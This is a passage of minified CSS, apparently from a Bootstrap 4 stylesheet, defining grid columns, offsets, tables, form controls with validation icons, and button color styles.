83.33333333%;max-width:83.33333333%}.col-11{flex:0 0 91.66666667%;max-width:91.66666667%}.col-12{flex:0 0 100%;max-width:100%}.order-first{order:-1}.order-last{order:13}.order-0{order:0}.order-1{order:1}.order-2{order:2}.order-3{order:3}.order-4{order:4}.order-5{order:5}.order-6{order:6}.order-7{order:7}.order-8{order:8}.order-9{order:9}.order-10{order:10}.order-11{order:11}.order-12{order:12}.offset-1{margin-left:8.33333333%}.offset-2{margin-left:16.66666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.33333333%}.offset-5{margin-left:41.66666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.33333333%}.offset-8{margin-left:66.66666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.33333333%}.offset-11{margin-left:91.66666667%}@media (min-width:576px){.col-sm{flex-basis:0;flex-grow:1;max-width:100%}.row-cols-sm-1>*{flex:0 0 100%;max-width:100%}.row-cols-sm-2>*{flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 25%;max-width:25%}.row-cols-sm-5>*{flex:0 0 20%;max-width:20%}.row-cols-sm-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-sm-auto{flex:0 0 auto;width:auto;max-width:100%}.col-sm-1{flex:0 0 8.33333333%;max-width:8.33333333%}.col-sm-2{flex:0 0 16.66666667%;max-width:16.66666667%}.col-sm-3{flex:0 0 25%;max-width:25%}.col-sm-4{flex:0 0 33.33333333%;max-width:33.33333333%}.col-sm-5{flex:0 0 41.66666667%;max-width:41.66666667%}.col-sm-6{flex:0 0 50%;max-width:50%}.col-sm-7{flex:0 0 58.33333333%;max-width:58.33333333%}.col-sm-8{flex:0 0 66.66666667%;max-width:66.66666667%}.col-sm-9{flex:0 0 75%;max-width:75%}.col-sm-10{flex:0 0 83.33333333%;max-width:83.33333333%}.col-sm-11{flex:0 0 91.66666667%;max-width:91.66666667%}.col-sm-12{flex:0 0 100%;max-width:100%}.order-sm-first{order:-1}.order-sm-last{order:13}.order-sm-0{order:0}.order-sm-1{order:1}.order-sm-2{order:2}.order-sm-3{order:3}.order-sm-4{order:4}.order-sm-5{order:5}.order-sm-6{order:6}.order-sm-7{order:7}.order-sm-8{order:8}.order-sm-9{order:9}.order-sm-10{order:10}.order-sm-11{order:11}.order-sm-12{order:12}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.33333333%}.offset-sm-2{margin-left:16.66666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.33333333%}.offset-sm-5{margin-left:41.66666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.33333333%}.offset-sm-8{margin-left:66.66666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.33333333%}.offset-sm-11{margin-left:91.66666667%}}@media (min-width:768px){.col-md{flex-basis:0;flex-grow:1;max-width:100%}.row-cols-md-1>*{flex:0 0 100%;max-width:100%}.row-cols-md-2>*{flex:0 0 50%;max-width:50%}.row-cols-md-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-md-4>*{flex:0 0 25%;max-width:25%}.row-cols-md-5>*{flex:0 0 20%;max-width:20%}.row-cols-md-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-md-auto{flex:0 0 auto;width:auto;max-width:100%}.col-md-1{flex:0 0 8.33333333%;max-width:8.33333333%}.col-md-2{flex:0 0 16.66666667%;max-width:16.66666667%}.col-md-3{flex:0 0 25%;max-width:25%}.col-md-4{flex:0 0 33.33333333%;max-width:33.33333333%}.col-md-5{flex:0 0 41.66666667%;max-width:41.66666667%}.col-md-6{flex:0 0 50%;max-width:50%}.col-md-7{flex:0 0 58.33333333%;max-width:58.33333333%}.col-md-8{flex:0 0 66.66666667%;max-width:66.66666667%}.col-md-9{flex:0 0 75%;max-width:75%}.col-md-10{flex:0 0 83.33333333%;max-width:83.33333333%}.col-md-11{flex:0 0 91.66666667%;max-width:91.66666667%}.col-md-12{flex:0 0 100%;max-width:100%}.order-md-first{order:-1}.order-md-last{order:13}.order-md-0{order:0}.order-md-1{order:1}.order-md-2{order:2}.order-md-3{order:3}.order-md-4{order:4}.order-md-5{order:5}.order-md-6{order:6}.order-md-7{order:7}.order-md-8{order:8}.order-md-9{order:9}.order-md-10{order:10}.order-md-11{order:11}.order-md-12{order:12}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.33333333%}.offset-md-2{margin-left:16.66666667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.33333333%}.offset-md-5{margin-left:41.66666667%}.offset-md-6{margin-left:50%}.offset-md-7{margin-left:58.33333333%}.offset-md-8{margin-left:66.66666667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.33333333%}.offset-md-11{margin-left:91.66666667%}}@media (min-width:992px){.col-lg{flex-basis:0;flex-grow:1;max-width:100%}.row-cols-lg-1>*{flex:0 0 100%;max-width:100%}.row-cols-lg-2>*{flex:0 0 50%;max-width:50%}.row-cols-lg-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-lg-4>*{flex:0 0 25%;max-width:25%}.row-cols-lg-5>*{flex:0 0 20%;max-width:20%}.row-cols-lg-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-lg-auto{flex:0 0 auto;width:auto;max-width:100%}.col-lg-1{flex:0 0 8.33333333%;max-width:8.33333333%}.col-lg-2{flex:0 0 16.66666667%;max-width:16.66666667%}.col-lg-3{flex:0 0 25%;max-width:25%}.col-lg-4{flex:0 0 33.33333333%;max-width:33.33333333%}.col-lg-5{flex:0 0 41.66666667%;max-width:41.66666667%}.col-lg-6{flex:0 0 50%;max-width:50%}.col-lg-7{flex:0 0 58.33333333%;max-width:58.33333333%}.col-lg-8{flex:0 0 66.66666667%;max-width:66.66666667%}.col-lg-9{flex:0 0 75%;max-width:75%}.col-lg-10{flex:0 0 83.33333333%;max-width:83.33333333%}.col-lg-11{flex:0 0 91.66666667%;max-width:91.66666667%}.col-lg-12{flex:0 0 100%;max-width:100%}.order-lg-first{order:-1}.order-lg-last{order:13}.order-lg-0{order:0}.order-lg-1{order:1}.order-lg-2{order:2}.order-lg-3{order:3}.order-lg-4{order:4}.order-lg-5{order:5}.order-lg-6{order:6}.order-lg-7{order:7}.order-lg-8{order:8}.order-lg-9{order:9}.order-lg-10{order:10}.order-lg-11{order:11}.order-lg-12{order:12}.offset-lg-0{margin-left:0}.offset-lg-1{margin-left:8.33333333%}.offset-lg-2{margin-left:16.66666667%}.offset-lg-3{margin-left:25%}.offset-lg-4{margin-left:33.33333333%}.offset-lg-5{margin-left:41.66666667%}.offset-lg-6{margin-left:50%}.offset-lg-7{margin-left:58.33333333%}.offset-lg-8{margin-left:66.66666667%}.offset-lg-9{margin-left:75%}.offset-lg-10{margin-left:83.33333333%}.offset-lg-11{margin-left:91.66666667%}}@media (min-width:1200px){.col-xl{flex-basis:0;flex-grow:1;max-width:100%}.row-cols-xl-1>*{flex:0 0 100%;max-width:100%}.row-cols-xl-2>*{flex:0 0 50%;max-width:50%}.row-cols-xl-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-xl-4>*{flex:0 0 25%;max-width:25%}.row-cols-xl-5>*{flex:0 0 20%;max-width:20%}.row-cols-xl-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-xl-auto{flex:0 0 auto;width:auto;max-width:100%}.col-xl-1{flex:0 0 8.33333333%;max-width:8.33333333%}.col-xl-2{flex:0 0 16.66666667%;max-width:16.66666667%}.col-xl-3{flex:0 0 25%;max-width:25%}.col-xl-4{flex:0 0 33.33333333%;max-width:33.33333333%}.col-xl-5{flex:0 0 41.66666667%;max-width:41.66666667%}.col-xl-6{flex:0 0 50%;max-width:50%}.col-xl-7{flex:0 0 58.33333333%;max-width:58.33333333%}.col-xl-8{flex:0 0 66.66666667%;max-width:66.66666667%}.col-xl-9{flex:0 0 75%;max-width:75%}.col-xl-10{flex:0 0 83.33333333%;max-width:83.33333333%}.col-xl-11{flex:0 0 91.66666667%;max-width:91.66666667%}.col-xl-12{flex:0 0 100%;max-width:100%}.order-xl-first{order:-1}.order-xl-last{order:13}.order-xl-0{order:0}.order-xl-1{order:1}.order-xl-2{order:2}.order-xl-3{order:3}.order-xl-4{order:4}.order-xl-5{order:5}.order-xl-6{order:6}.order-xl-7{order:7}.order-xl-8{order:8}.order-xl-9{order:9}.order-xl-10{order:10}.order-xl-11{order:11}.order-xl-12{order:12}.offset-xl-0{margin-left:0}.offset-xl-1{margin-left:8.33333333%}.offset-xl-2{margin-left:16.66666667%}.offset-xl-3{margin-left:25%}.offset-xl-4{margin-left:33.33333333%}.offset-xl-5{margin-left:41.66666667%}.offset-xl-6{margin-left:50%}.offset-xl-7{margin-left:58.33333333%}.offset-xl-8{margin-left:66.66666667%}.offset-xl-9{margin-left:75%}.offset-xl-10{margin-left:83.33333333%}.offset-xl-11{margin-left:91.66666667%}}.table{width:100%;margin-bottom:1rem;color:#212529}.table td,.table th{padding:.75rem;vertical-align:top;border-top:1px solid #dee2e6}.table thead th{vertical-align:bottom;border-bottom:2px solid #dee2e6}.table tbody+tbody{border-top:2px solid #dee2e6}.table-sm td,.table-sm th{padding:.3rem}.table-bordered{border:1px solid #dee2e6}.table-bordered td,.table-bordered th{border:1px solid #dee2e6}.table-bordered thead td,.table-bordered thead th{border-bottom-width:2px}.table-borderless tbody+tbody,.table-borderless td,.table-borderless th,.table-borderless thead th{border:0}.table-striped tbody tr:nth-of-type(odd){background-color:rgba(0,0,0,.05)}.table-hover tbody tr:hover{color:#212529;background-color:rgba(0,0,0,.075)}.table-primary,.table-primary>td,.table-primary>th{background-color:#b8daff}.table-primary tbody+tbody,.table-primary td,.table-primary th,.table-primary thead th{border-color:#7abaff}.table-hover .table-primary:hover{background-color:#9fcdff}.table-hover .table-primary:hover>td,.table-hover .table-primary:hover>th{background-color:#9fcdff}.table-secondary,.table-secondary>td,.table-secondary>th{background-color:#d6d8db}.table-secondary tbody+tbody,.table-secondary td,.table-secondary th,.table-secondary thead th{border-color:#b3b7bb}.table-hover .table-secondary:hover{background-color:#c8cbcf}.table-hover .table-secondary:hover>td,.table-hover .table-secondary:hover>th{background-color:#c8cbcf}.table-success,.table-success>td,.table-success>th{background-color:#c3e6cb}.table-success tbody+tbody,.table-success td,.table-success th,.table-success thead th{border-color:#8fd19e}.table-hover .table-success:hover{background-color:#b1dfbb}.table-hover .table-success:hover>td,.table-hover .table-success:hover>th{background-color:#b1dfbb}.table-info,.table-info>td,.table-info>th{background-color:#bee5eb}.table-info tbody+tbody,.table-info td,.table-info th,.table-info thead th{border-color:#86cfda}.table-hover .table-info:hover{background-color:#abdde5}.table-hover .table-info:hover>td,.table-hover .table-info:hover>th{background-color:#abdde5}.table-warning,.table-warning>td,.table-warning>th{background-color:#ffeeba}.table-warning tbody+tbody,.table-warning td,.table-warning th,.table-warning thead th{border-color:#ffdf7e}.table-hover .table-warning:hover{background-color:#ffe8a1}.table-hover .table-warning:hover>td,.table-hover .table-warning:hover>th{background-color:#ffe8a1}.table-danger,.table-danger>td,.table-danger>th{background-color:#f5c6cb}.table-danger tbody+tbody,.table-danger td,.table-danger th,.table-danger thead th{border-color:#ed969e}.table-hover .table-danger:hover{background-color:#f1b0b7}.table-hover .table-danger:hover>td,.table-hover .table-danger:hover>th{background-color:#f1b0b7}.table-light,.table-light>td,.table-light>th{background-color:#fdfdfe}.table-light tbody+tbody,.table-light td,.table-light th,.table-light thead th{border-color:#fbfcfc}.table-hover .table-light:hover{background-color:#ececf6}.table-hover .table-light:hover>td,.table-hover .table-light:hover>th{background-color:#ececf6}.table-dark,.table-dark>td,.table-dark>th{background-color:#c6c8ca}.table-dark tbody+tbody,.table-dark td,.table-dark th,.table-dark thead th{border-color:#95999c}.table-hover .table-dark:hover{background-color:#b9bbbe}.table-hover .table-dark:hover>td,.table-hover .table-dark:hover>th{background-color:#b9bbbe}.table-active,.table-active>td,.table-active>th{background-color:rgba(0,0,0,.075)}.table-hover .table-active:hover{background-color:rgba(0,0,0,.075)}.table-hover .table-active:hover>td,.table-hover .table-active:hover>th{background-color:rgba(0,0,0,.075)}.table .thead-dark th{color:#fff;background-color:#343a40;border-color:#454d55}.table .thead-light th{color:#495057;background-color:#e9ecef;border-color:#dee2e6}.table-dark{color:#fff;background-color:#343a40}.table-dark td,.table-dark th,.table-dark thead th{border-color:#454d55}.table-dark.table-bordered{border:0}.table-dark.table-striped tbody tr:nth-of-type(odd){background-color:rgba(255,255,255,.05)}.table-dark.table-hover tbody tr:hover{color:#fff;background-color:rgba(255,255,255,.075)}@media (max-width:575.98px){.table-responsive-sm{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive-sm>.table-bordered{border:0}}@media (max-width:767.98px){.table-responsive-md{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive-md>.table-bordered{border:0}}@media (max-width:991.98px){.table-responsive-lg{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive-lg>.table-bordered{border:0}}@media (max-width:1199.98px){.table-responsive-xl{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive-xl>.table-bordered{border:0}}.table-responsive{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive>.table-bordered{border:0}.form-control{display:block;width:100%;height:calc(1.5em + .75rem + 2px);padding:.375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;background-clip:padding-box;border:1px solid #ced4da;border-radius:.25rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control{transition:none}}.form-control::-ms-expand{background-color:transparent;border:0}.form-control:focus{color:#495057;background-color:#fff;border-color:#80bdff;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.form-control::placeholder{color:#6c757d;opacity:1}.form-control:disabled,.form-control[readonly]{background-color:#e9ecef;opacity:1}input[type=date].form-control,input[type=datetime-local].form-control,input[type=month].form-control,input[type=time].form-control{appearance:none}select.form-control:-moz-focusring{color:transparent;text-shadow:0 0 0 #495057}select.form-control:focus::-ms-value{color:#495057;background-color:#fff}.form-control-file,.form-control-range{display:block;width:100%}.col-form-label{padding-top:calc(.375rem + 1px);padding-bottom:calc(.375rem + 1px);margin-bottom:0;font-size:inherit;line-height:1.5}.col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px);font-size:1.25rem;line-height:1.5}.col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.875rem;line-height:1.5}.form-control-plaintext{display:block;width:100%;padding:.375rem 0;margin-bottom:0;font-size:1rem;line-height:1.5;color:#212529;background-color:transparent;border:solid transparent;border-width:1px 0}.form-control-plaintext.form-control-lg,.form-control-plaintext.form-control-sm{padding-right:0;padding-left:0}.form-control-sm{height:calc(1.5em + .5rem + 2px);padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.form-control-lg{height:calc(1.5em + 1rem + 2px);padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}select.form-control[multiple],select.form-control[size]{height:auto}textarea.form-control{height:auto}.form-group{margin-bottom:1rem}.form-text{display:block;margin-top:.25rem}.form-row{display:flex;flex-wrap:wrap;margin-right:-5px;margin-left:-5px}.form-row>.col,.form-row>[class*=col-]{padding-right:5px;padding-left:5px}.form-check{position:relative;display:block;padding-left:1.25rem}.form-check-input{position:absolute;margin-top:.3rem;margin-left:-1.25rem}.form-check-input:disabled~.form-check-label,.form-check-input[disabled]~.form-check-label{color:#6c757d}.form-check-label{margin-bottom:0}.form-check-inline{display:inline-flex;align-items:center;padding-left:0;margin-right:.75rem}.form-check-inline .form-check-input{position:static;margin-top:0;margin-right:.3125rem;margin-left:0}.valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#28a745}.valid-tooltip{position:absolute;top:100%;left:0;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;line-height:1.5;color:#fff;background-color:rgba(40,167,69,.9);border-radius:.25rem}.form-row>.col>.valid-tooltip,.form-row>[class*=col-]>.valid-tooltip{left:5px}.is-valid~.valid-feedback,.is-valid~.valid-tooltip,.was-validated :valid~.valid-feedback,.was-validated :valid~.valid-tooltip{display:block}.form-control.is-valid,.was-validated .form-control:valid{border-color:#28a745;padding-right:calc(1.5em + .75rem)!important;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(.375em + .1875rem) center;background-size:calc(.75em + .375rem) calc(.75em + .375rem)}.form-control.is-valid:focus,.was-validated .form-control:valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.was-validated select.form-control:valid,select.form-control.is-valid{padding-right:3rem!important;background-position:right 1.5rem center}.was-validated textarea.form-control:valid,textarea.form-control.is-valid{padding-right:calc(1.5em + .75rem);background-position:top calc(.375em + .1875rem) right calc(.375em + .1875rem)}.custom-select.is-valid,.was-validated .custom-select:valid{border-color:#28a745;padding-right:calc(.75em + 2.3125rem)!important;background:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") right .75rem center/8px 10px no-repeat,#fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e") center right 1.75rem/calc(.75em + .375rem) calc(.75em + .375rem) no-repeat}.custom-select.is-valid:focus,.was-validated .custom-select:valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.form-check-input.is-valid~.form-check-label,.was-validated .form-check-input:valid~.form-check-label{color:#28a745}.form-check-input.is-valid~.valid-feedback,.form-check-input.is-valid~.valid-tooltip,.was-validated .form-check-input:valid~.valid-feedback,.was-validated .form-check-input:valid~.valid-tooltip{display:block}.custom-control-input.is-valid~.custom-control-label,.was-validated .custom-control-input:valid~.custom-control-label{color:#28a745}.custom-control-input.is-valid~.custom-control-label::before,.was-validated .custom-control-input:valid~.custom-control-label::before{border-color:#28a745}.custom-control-input.is-valid:checked~.custom-control-label::before,.was-validated .custom-control-input:valid:checked~.custom-control-label::before{border-color:#34ce57;background-color:#34ce57}.custom-control-input.is-valid:focus~.custom-control-label::before,.was-validated .custom-control-input:valid:focus~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.custom-control-input.is-valid:focus:not(:checked)~.custom-control-label::before,.was-validated .custom-control-input:valid:focus:not(:checked)~.custom-control-label::before{border-color:#28a745}.custom-file-input.is-valid~.custom-file-label,.was-validated .custom-file-input:valid~.custom-file-label{border-color:#28a745}.custom-file-input.is-valid:focus~.custom-file-label,.was-validated .custom-file-input:valid:focus~.custom-file-label{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#dc3545}.invalid-tooltip{position:absolute;top:100%;left:0;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;line-height:1.5;color:#fff;background-color:rgba(220,53,69,.9);border-radius:.25rem}.form-row>.col>.invalid-tooltip,.form-row>[class*=col-]>.invalid-tooltip{left:5px}.is-invalid~.invalid-feedback,.is-invalid~.invalid-tooltip,.was-validated :invalid~.invalid-feedback,.was-validated :invalid~.invalid-tooltip{display:block}.form-control.is-invalid,.was-validated .form-control:invalid{border-color:#dc3545;padding-right:calc(1.5em + .75rem)!important;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23dc3545' viewBox='0 0 12 12'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(.375em + .1875rem) center;background-size:calc(.75em + .375rem) calc(.75em + .375rem)}.form-control.is-invalid:focus,.was-validated .form-control:invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.was-validated select.form-control:invalid,select.form-control.is-invalid{padding-right:3rem!important;background-position:right 1.5rem center}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid{padding-right:calc(1.5em + .75rem);background-position:top calc(.375em + .1875rem) right calc(.375em + .1875rem)}.custom-select.is-invalid,.was-validated .custom-select:invalid{border-color:#dc3545;padding-right:calc(.75em + 2.3125rem)!important;background:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") right .75rem center/8px 10px no-repeat,#fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23dc3545' viewBox='0 0 12 12'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e") center right 1.75rem/calc(.75em + .375rem) calc(.75em + .375rem) no-repeat}.custom-select.is-invalid:focus,.was-validated .custom-select:invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.form-check-input.is-invalid~.form-check-label,.was-validated .form-check-input:invalid~.form-check-label{color:#dc3545}.form-check-input.is-invalid~.invalid-feedback,.form-check-input.is-invalid~.invalid-tooltip,.was-validated .form-check-input:invalid~.invalid-feedback,.was-validated .form-check-input:invalid~.invalid-tooltip{display:block}.custom-control-input.is-invalid~.custom-control-label,.was-validated .custom-control-input:invalid~.custom-control-label{color:#dc3545}.custom-control-input.is-invalid~.custom-control-label::before,.was-validated .custom-control-input:invalid~.custom-control-label::before{border-color:#dc3545}.custom-control-input.is-invalid:checked~.custom-control-label::before,.was-validated .custom-control-input:invalid:checked~.custom-control-label::before{border-color:#e4606d;background-color:#e4606d}.custom-control-input.is-invalid:focus~.custom-control-label::before,.was-validated .custom-control-input:invalid:focus~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.custom-control-input.is-invalid:focus:not(:checked)~.custom-control-label::before,.was-validated .custom-control-input:invalid:focus:not(:checked)~.custom-control-label::before{border-color:#dc3545}.custom-file-input.is-invalid~.custom-file-label,.was-validated .custom-file-input:invalid~.custom-file-label{border-color:#dc3545}.custom-file-input.is-invalid:focus~.custom-file-label,.was-validated .custom-file-input:invalid:focus~.custom-file-label{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.form-inline{display:flex;flex-flow:row wrap;align-items:center}.form-inline .form-check{width:100%}@media (min-width:576px){.form-inline label{display:flex;align-items:center;justify-content:center;margin-bottom:0}.form-inline .form-group{display:flex;flex:0 0 auto;flex-flow:row wrap;align-items:center;margin-bottom:0}.form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.form-inline .form-control-plaintext{display:inline-block}.form-inline .custom-select,.form-inline .input-group{width:auto}.form-inline .form-check{display:flex;align-items:center;justify-content:center;width:auto;padding-left:0}.form-inline .form-check-input{position:relative;flex-shrink:0;margin-top:0;margin-right:.25rem;margin-left:0}.form-inline .custom-control{align-items:center;justify-content:center}.form-inline .custom-control-label{margin-bottom:0}}.btn{display:inline-block;font-weight:400;color:#212529;text-align:center;vertical-align:middle;user-select:none;background-color:transparent;border:1px solid transparent;padding:.375rem .75rem;font-size:1rem;line-height:1.5;border-radius:.25rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.btn{transition:none}}.btn:hover{color:#212529;text-decoration:none}.btn.focus,.btn:focus{outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.btn.disabled,.btn:disabled{opacity:.65}.btn:not(:disabled):not(.disabled){cursor:pointer}a.btn.disabled,fieldset:disabled a.btn{pointer-events:none}.btn-primary{color:#fff;background-color:#007bff;border-color:#007bff}.btn-primary:hover{color:#fff;background-color:#0069d9;border-color:#0062cc}.btn-primary.focus,.btn-primary:focus{color:#fff;background-color:#0069d9;border-color:#0062cc;box-shadow:0 0 0 .2rem rgba(38,143,255,.5)}.btn-primary.disabled,.btn-primary:disabled{color:#fff;background-color:#007bff;border-color:#007bff}.btn-primary:not(:disabled):not(.disabled).active,.btn-primary:not(:disabled):not(.disabled):active,.show>.btn-primary.dropdown-toggle{color:#fff;background-color:#0062cc;border-color:#005cbf}.btn-primary:not(:disabled):not(.disabled).active:focus,.btn-primary:not(:disabled):not(.disabled):active:focus,.show>.btn-primary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(38,143,255,.5)}.btn-secondary{color:#fff;background-color:#6c757d;border-color:#6c757d}.btn-secondary:hover{color:#fff;background-color:#5a6268;border-color:#545b62}.btn-secondary.focus,.btn-secondary:focus{color:#fff;background-color:#5a6268;border-color:#545b62;box-shadow:0 0 0 .2rem rgba(130,138,145,.5)}.btn-secondary.disabled,.btn-secondary:disabled{color:#fff;background-color:#6c757d;border-color:#6c757d}.btn-secondary:not(:disabled):not(.disabled).active,.btn-secondary:not(:disabled):not(.disabled):active,.show>.btn-secondary.dropdown-toggle{color:#fff;background-color:#545b62;border-color:#4e555b}.btn-secondary:not(:disabled):not(.disabled).active:focus,.btn-secondary:not(:disabled):not(.disabled):active:focus,.show>.btn-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(130,138,145,.5)}.btn-success{color:#fff;background-color:#28a745;border-color:#28a745}.btn-success:hover{color:#fff;background-color:#218838;border-color:#1e7e34}.btn-success.focus,.btn-success:focus{color:#fff;background-color:#218838;border-color:#1e7e34;box-shadow:0 0 0 .2rem rgba(72,180,97,.5)}.btn-success.disabled,.btn-success:disabled{color:#fff;background-color:#28a745;border-color:#28a745}.btn-success:not(:disabled):not(.disabled).active,.btn-success:not(:disabled):not(.disabled):active,.show>.btn-success.dropdown-toggle{color:#fff;background-color:#1e7e34;border-color:#1c7430}.btn-success:not(:disabled):not(.disabled).active:focus,.btn-success:not(:disabled):not(.disabled):active:focus,.show>.btn-success.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(72,180,97,.5)}.btn-info{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-info:hover{color:#fff;background-color:#138496;border-color:#117a8b}.btn-info.focus,.btn-info:focus{color:#fff;background-color:#138496;border-color:#117a8b;box-shadow:0 0 0 .2rem rgba(58,176,195,.5)}.btn-info.disabled,.btn-info:disabled{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-info:not(:disabled):not(.disabled).active,.btn-info:not(:disabled):not(.disabled):active,.show>.btn-info.dropdown-toggle{color:#fff;background-color:#117a8b;border-color:#10707f}.btn-info:not(:disabled):not(.disabled).active:focus,.btn-info:not(:disabled):not(.disabled):active:focus,.show>.btn-info.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(58,176,195,.5)}.btn-warning{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-warning:hover{color:#212529;background-color:#e0a800;border-color:#d39e00}.btn-warning.focus,.btn-warning:focus{color:#212529;background-color:#e0a800;border-color:#d39e00;box-shadow:0 0 0 .2rem rgba(222,170,12,.5)}.btn-warning.disabled,.btn-warning:disabled{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-warning:not(:disabled):not(.disabled).active,.btn-warning:not(:disabled):not(.disabled):active,.show>.btn-warning.dropdown-toggle{color:#212529;background-color:#d39e00;border-color:#c69500}.btn-warning:not(:disabled):not(.disabled).active:focus,.btn-warning:not(:disabled):not(.disabled):active:focus,.show>.btn-warning.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(222,170,12,.5)}.btn-danger{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-danger:hover{color:#fff;background-color:#c82333;border-color:#bd2130}.btn-danger.focus,.btn-danger:focus{color:#fff;background-color:#c82333;border-color:#bd2130;box-shadow:0 0 0 .2rem rgba(225,83,97,.5)}.btn-danger.disabled,.btn-danger:disabled{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-danger:not(:disabled):not(.disabled).active,.btn-danger:not(:disabled):not(.disabled):active,.show>.btn-danger.dropdown-toggle{color:#fff;background-color:#bd2130;border-color:#b21f2d}.btn-danger:not(:disabled):not(.disabled).active:focus,.btn-danger:not(:disabled):not(.disabled):active:focus,.show>.btn-danger.dropdown-toggle:focus{box-shadow:0 0 0 .2rem 